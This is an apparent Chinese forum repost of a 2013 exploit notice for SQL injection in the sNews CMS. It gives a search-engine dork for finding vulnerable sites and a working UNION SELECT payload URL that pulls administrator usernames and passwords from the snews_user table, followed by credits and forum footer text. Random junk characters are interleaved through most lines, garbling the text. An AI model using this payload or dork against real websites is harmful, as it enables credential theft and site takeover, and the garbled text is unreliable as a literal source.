标题: CMS snews SQL Injection Vulnerability8 _- ?/ i) [! L" \) A$ |8 i' _
作者: By onestree7 v; T6 x) D2 j, ~$ z- Q8 \
下载地址 : http://snewscms.com/2 B9 ?$ U' P7 S. o f5 \5 ]( n
测试平台 : ubuntu 12.10 / win 7$ l# d p. ?6 l
关键词: inurl:"tanyakan pada rumput yang bergoyang"
' x" j+ }+ |+ E, o) q" C7 z
7 Z5 O x" ^+ b+ |4 d& ^0 A T- K$ A% N1 M7 q% D
*************************************************************9 R; R0 |0 d% F( |. \: u
* H$ j4 h( E+ L3 P2 o9 s0 }SQL poc:
' g( Y* m% {8 o1 E+ T) a
$ r# ~! {' P5 G& nhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]7 P* c# U# `" b2 {7 o
, J' E( }5 e6 z! w. {3 D
示例
2 l. B& {0 V5 I# x ! J% j; j& s, w! D9 ~
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* U8 e0 r3 r# ^4 M/ U
F. w; [1 x1 h+ s: D2 T5 G5 g
8 H h Y9 C9 m& }$ c* A致谢:
+ r* v; K3 f( n) m
7 e* |& L9 ], D Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
4 T( q+ z: K& W" _' C
- O H# e: J2 ], f/ i, X' i% W; E9 n4 J indonesiancoder - moeslimh4x0r - go-coder+ ~5 i `/ ~% C% ?$ J( i' y$ U0 m
$ _' F8 q1 }! W( w8 ^' n: M3 @spesial my hunny :*# H c/ o' R+ C# o
|
发表于 2013-1-23 08:55:06
收藏
支持
反对